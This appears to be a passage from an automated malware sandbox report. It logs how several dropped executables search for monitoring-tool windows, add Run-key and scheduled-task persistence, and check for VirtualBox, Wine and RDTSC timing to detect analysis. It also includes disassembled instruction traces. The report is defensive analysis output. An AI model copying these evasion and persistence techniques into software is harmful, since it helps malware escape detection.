                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fc1511c233.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fc1511c233.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6ae2430bb1.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6ae2430bb1.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1b3b76c439.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1b3b76c439.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f9882ce6c1.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f9882ce6c1.exeJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9D55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_6C9D55F0
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                          Query firmware table information (likely to detect VMs)
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSystem information queried: FirmwareTableInformation
                          Tries to detect sandboxes / dynamic malware analysis system (registry check)
                          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Tries to detect virtualization through RDTSC time measurements
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEF804 second address: CEF818 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED29Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E63CE1 second address: E63CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E63CE7 second address: E63D01 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBBA93ED296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FBBA93ED298h 0x00000010 pop ecx 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E63D01 second address: E63D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E63D05 second address: E63D10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E63D10 second address: E63D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E62F54 second address: E62F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBBA93ED296h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E62F63 second address: E62F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E63386 second address: E6338C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6338C second address: E633A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502AC7h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E655CB second address: E655DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBA93ED2A0h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E655DF second address: CEF804 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 4B7B8FCBh 0x0000000f adc edx, 2377CEF3h 0x00000015 mov dword ptr [ebp+122D2519h], edi 0x0000001b push dword ptr [ebp+122D00D1h] 0x00000021 mov esi, dword ptr [ebp+122D2739h] 0x00000027 call dword ptr [ebp+122D1B0Ah] 0x0000002d pushad 0x0000002e mov dword ptr [ebp+122D2791h], ebx 0x00000034 xor eax, eax 0x00000036 jnp 00007FBBA8502ABCh 0x0000003c sub dword ptr [ebp+122D2712h], edx 0x00000042 mov edx, dword ptr [esp+28h] 0x00000046 add dword ptr [ebp+122D2791h], eax 0x0000004c mov dword ptr [ebp+122D2BD3h], eax 0x00000052 jmp 00007FBBA8502AC0h 0x00000057 mov esi, 0000003Ch 0x0000005c sub dword ptr [ebp+122D1A56h], eax 0x00000062 jmp 00007FBBA8502ABCh 0x00000067 add esi, dword ptr [esp+24h] 0x0000006b xor dword ptr [ebp+122D2712h], esi 0x00000071 lodsw 0x00000073 cld 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 sub dword ptr [ebp+122D2712h], eax 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 mov dword ptr [ebp+122D1A56h], ecx 0x00000088 nop 0x00000089 pushad 0x0000008a push eax 0x0000008b push edx 0x0000008c jmp 00007FBBA8502AC7h 0x00000091 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6563F second address: E65645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E65645 second address: E656A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FBBA8502AC0h 0x0000000e nop 0x0000000f clc 0x00000010 push 00000000h 0x00000012 js 00007FBBA8502AB8h 0x00000018 mov edi, esi 0x0000001a call 00007FBBA8502AB9h 0x0000001f push eax 0x00000020 jmp 00007FBBA8502AC8h 0x00000025 pop eax 0x00000026 push eax 0x00000027 jbe 00007FBBA8502ABAh 0x0000002d push edi 0x0000002e push edx 0x0000002f pop edx 0x00000030 pop edi 0x00000031 mov eax, dword ptr [esp+04h] 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 jbe 00007FBBA8502AB6h 0x0000003e pop eax 0x0000003f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E657AC second address: E657B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6583C second address: E65840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E65840 second address: E65874 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED2A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f jmp 00007FBBA93ED2A4h 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E65874 second address: E65886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jl 00007FBBA8502AC0h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E659A1 second address: E659A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86D9A second address: E86DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBBA8502AC3h 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8521C second address: E8522A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBA93ED29Ah 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8522A second address: E8522E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E859BA second address: E859C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E859C5 second address: E859C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E859C9 second address: E859E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED2A7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E85B50 second address: E85B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 je 00007FBBA8502AB6h 0x0000000c pop eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FBBA8502AB6h 0x00000016 jns 00007FBBA8502AB6h 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E85F78 second address: E85F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA93ED2A1h 0x00000009 popad 0x0000000a pop edi 0x0000000b push edi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jg 00007FBBA93ED296h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E864DE second address: E864FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FBBA8502AC1h 0x0000000b jnc 00007FBBA8502AB6h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8663F second address: E86661 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 jmp 00007FBBA93ED2A4h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop edi 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86661 second address: E86667 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86667 second address: E8667B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBBA93ED296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007FBBA93ED29Eh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E867C0 second address: E867C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E868F5 second address: E86910 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED2A7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86910 second address: E86916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86C14 second address: E86C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86C18 second address: E86C32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FBBA8502AB6h 0x00000010 jmp 00007FBBA8502ABAh 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86C32 second address: E86C49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED2A3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8ADD4 second address: E8ADD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8ADD8 second address: E8ADDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E89761 second address: E89777 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBBA8502AB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b je 00007FBBA8502ABEh 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E90F7C second address: E90F9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED2A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E90F9E second address: E90FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007FBBA8502ABCh 0x0000000b jc 00007FBBA8502AB6h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E910ED second address: E91106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBBA93ED2A4h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E92DFC second address: E92E06 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBBA8502AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93160 second address: E93164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93164 second address: E9316E instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBBA8502AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93A2B second address: E93A2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93A2F second address: E93A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93AA6 second address: E93AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
